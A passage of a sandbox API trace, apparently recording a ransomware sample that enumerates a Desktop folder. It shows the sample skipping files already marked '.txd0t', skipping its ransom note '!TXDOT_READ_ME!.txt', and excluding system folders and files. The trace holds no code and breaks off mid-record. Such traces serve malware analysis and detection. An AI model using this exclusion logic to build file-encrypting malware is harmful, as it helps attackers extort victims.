StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.308] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685a7a10, ftCreationTime.dwHighDateTime=0x1d5e744, ftLastAccessTime.dwLowDateTime=0xad94c880, ftLastAccessTime.dwHighDateTime=0x1d5ea2b, ftLastWriteTime.dwLowDateTime=0x50f2dc3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11419, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SbwWluUpbQiQnJG8qbe.pdf.txd0t", cAlternateFileName="SBWWLU~1.TXD")) returned 1 [0119.308] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf.txd0t", psz2=".") returned 1 [0119.308] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf.txd0t", psz2="..") returned 1 [0119.308] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.308] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SbwWluUpbQiQnJG8qbe.pdf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t" [0119.308] PathFindExtensionW (pszPath="SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned=".txd0t" [0119.308] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.308] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63b7220, ftCreationTime.dwHighDateTime=0x1d5eb85, ftLastAccessTime.dwLowDateTime=0x34ae9370, ftLastAccessTime.dwHighDateTime=0x1d5e91c, ftLastWriteTime.dwLowDateTime=0x50f2dc3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16946, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SJcMEwGL9beIVl4.wav.txd0t", cAlternateFileName="SJCMEW~1.TXD")) returned 1 [0119.308] StrCmpW (psz1="SJcMEwGL9beIVl4.wav.txd0t", psz2=".") returned 1 [0119.308] StrCmpW (psz1="SJcMEwGL9beIVl4.wav.txd0t", psz2="..") returned 1 [0119.309] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.309] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.309] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SJcMEwGL9beIVl4.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t" [0119.309] PathFindExtensionW (pszPath="SJcMEwGL9beIVl4.wav.txd0t") returned=".txd0t" [0119.309] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.309] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="T2UrA", cAlternateFileName="")) returned 1 [0119.309] StrCmpW (psz1="T2UrA", psz2=".") returned 1 [0119.309] StrCmpW (psz1="T2UrA", psz2="..") returned 1 [0119.309] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.309] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.309] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="T2UrA", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system32\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\local\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\boot\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\perflogs\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\programdata\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\drivers\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\wsus\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="crypt_detect") returned 0x0 [0119.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="cryptolocker") returned 0x0 [0119.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="ransomware") returned 0x0 [0119.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\WINDOWS") returned 0x0 [0119.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files") returned 0x0 [0119.310] GetProcessHeap () returned 0xe30000 [0119.310] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xed39f8 [0119.310] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.310] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*" [0119.310] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0119.310] StrCmpW (psz1=".", psz2=".") returned 0 [0119.310] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0x5137ec48, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.310] StrCmpW (psz1="..", psz2=".") returned 1 [0119.310] StrCmpW (psz1="..", psz2="..") returned 0 [0119.310] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x510377ec, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x510377ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x510d01cb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.310] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.310] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.310] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.310] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt" [0119.311] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.311] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.312] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe15650, ftCreationTime.dwHighDateTime=0x1d5e500, ftLastAccessTime.dwLowDateTime=0xcd226e0, ftLastAccessTime.dwHighDateTime=0x1d5eb39, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1579, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="36V5IRtis-.pps.txd0t", cAlternateFileName="36V5IR~1.TXD")) returned 1 [0119.312] StrCmpW (psz1="36V5IRtis-.pps.txd0t", psz2=".") returned 1 [0119.312] StrCmpW (psz1="36V5IRtis-.pps.txd0t", psz2="..") returned 1 [0119.312] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="36V5IRtis-.pps.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t" [0119.312] PathFindExtensionW (pszPath="36V5IRtis-.pps.txd0t") returned=".txd0t" [0119.312] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.312] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3cba40, ftCreationTime.dwHighDateTime=0x1d5efc5, ftLastAccessTime.dwLowDateTime=0x246cc5d0, ftLastAccessTime.dwHighDateTime=0x1d5e800, ftLastWriteTime.dwLowDateTime=0x51011668, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xddb4, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3dId0lsBJQweABTLa.bmp.txd0t", cAlternateFileName="3DID0L~1.TXD")) returned 1 [0119.312] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp.txd0t", psz2=".") returned 1 [0119.312] StrCmpW (psz1="3dId0lsBJQweABTLa.bmp.txd0t", psz2="..") returned 1 [0119.312] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="3dId0lsBJQweABTLa.bmp.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t" [0119.312] PathFindExtensionW (pszPath="3dId0lsBJQweABTLa.bmp.txd0t") returned=".txd0t" [0119.312] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.312] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde3152a0, ftCreationTime.dwHighDateTime=0x1d5efae, ftLastAccessTime.dwLowDateTime=0xc34157f0, ftLastAccessTime.dwHighDateTime=0x1d5eab4, ftLastWriteTime.dwLowDateTime=0x510377ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16e02, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8_rlQ cdl 6S_NtQ4.ods.txd0t", cAlternateFileName="8_RLQC~1.TXD")) returned 1 [0119.312] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods.txd0t", psz2=".") returned 1 [0119.312] StrCmpW (psz1="8_rlQ cdl 6S_NtQ4.ods.txd0t", psz2="..") returned 1 [0119.312] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="8_rlQ cdl 6S_NtQ4.ods.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t" [0119.312] PathFindExtensionW (pszPath="8_rlQ cdl 6S_NtQ4.ods.txd0t") returned=".txd0t" [0119.312] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.312] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2df6f500, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0xe2b8a110, ftLastAccessTime.dwHighDateTime=0x1d5e96f, ftLastWriteTime.dwLowDateTime=0x510d01cb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1178d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="9JP3XV6aItTN8Fsv.gif.txd0t", cAlternateFileName="9JP3XV~1.TXD")) returned 1 [0119.312] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif.txd0t", psz2=".") returned 1 [0119.312] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif.txd0t", psz2="..") returned 1 [0119.312] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.312] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="9JP3XV6aItTN8Fsv.gif.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t" [0119.312] PathFindExtensionW (pszPath="9JP3XV6aItTN8Fsv.gif.txd0t") returned=".txd0t" [0119.312] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.312] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e374e70, ftCreationTime.dwHighDateTime=0x1d5e95f, ftLastAccessTime.dwLowDateTime=0x551e57d0, ftLastAccessTime.dwHighDateTime=0x1d5e0fc, ftLastWriteTime.dwLowDateTime=0x510f63bc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd697, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aNP_CKGono8FHP.bmp.txd0t", cAlternateFileName="ANP_CK~1.TXD")) returned 1 [0119.313] StrCmpW (psz1="aNP_CKGono8FHP.bmp.txd0t", psz2=".") returned 1 [0119.313] StrCmpW (psz1="aNP_CKGono8FHP.bmp.txd0t", psz2="..") returned 1 [0119.313] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="aNP_CKGono8FHP.bmp.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t" [0119.313] PathFindExtensionW (pszPath="aNP_CKGono8FHP.bmp.txd0t") returned=".txd0t" [0119.313] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.313] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d84430, ftCreationTime.dwHighDateTime=0x1d5ec72, ftLastAccessTime.dwLowDateTime=0x6b71ab60, ftLastAccessTime.dwHighDateTime=0x1d5edb6, ftLastWriteTime.dwLowDateTime=0x510f63bc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3398, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Eiu0lN-XaE.docx.txd0t", cAlternateFileName="EIU0LN~1.TXD")) returned 1 [0119.313] StrCmpW (psz1="Eiu0lN-XaE.docx.txd0t", psz2=".") returned 1 [0119.313] StrCmpW (psz1="Eiu0lN-XaE.docx.txd0t", psz2="..") returned 1 [0119.313] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Eiu0lN-XaE.docx.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t" [0119.313] PathFindExtensionW (pszPath="Eiu0lN-XaE.docx.txd0t") returned=".txd0t" [0119.313] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.313] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210b79b0, ftCreationTime.dwHighDateTime=0x1d5e3df, ftLastAccessTime.dwLowDateTime=0xcdbaa770, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0x5111c5b5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15427, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="I0Kapz95f.avi.txd0t", cAlternateFileName="I0KAPZ~1.TXD")) returned 1 [0119.313] StrCmpW (psz1="I0Kapz95f.avi.txd0t", psz2=".") returned 1 [0119.313] StrCmpW (psz1="I0Kapz95f.avi.txd0t", psz2="..") returned 1 [0119.313] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="I0Kapz95f.avi.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t" [0119.313] PathFindExtensionW (pszPath="I0Kapz95f.avi.txd0t") returned=".txd0t" [0119.313] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.313] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27f63220, ftCreationTime.dwHighDateTime=0x1d5ea5a, ftLastAccessTime.dwLowDateTime=0x961c3bd0, ftLastAccessTime.dwHighDateTime=0x1d5edf9, ftLastWriteTime.dwLowDateTime=0x5114291c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9158, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OCsemDUOtc.swf.txd0t", cAlternateFileName="OCSEMD~1.TXD")) returned 1 [0119.313] StrCmpW (psz1="OCsemDUOtc.swf.txd0t", psz2=".") returned 1 [0119.313] StrCmpW (psz1="OCsemDUOtc.swf.txd0t", psz2="..") returned 1 [0119.313] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.313] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="OCsemDUOtc.swf.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t" [0119.313] PathFindExtensionW (pszPath="OCsemDUOtc.swf.txd0t") returned=".txd0t" [0119.313] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.313] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, 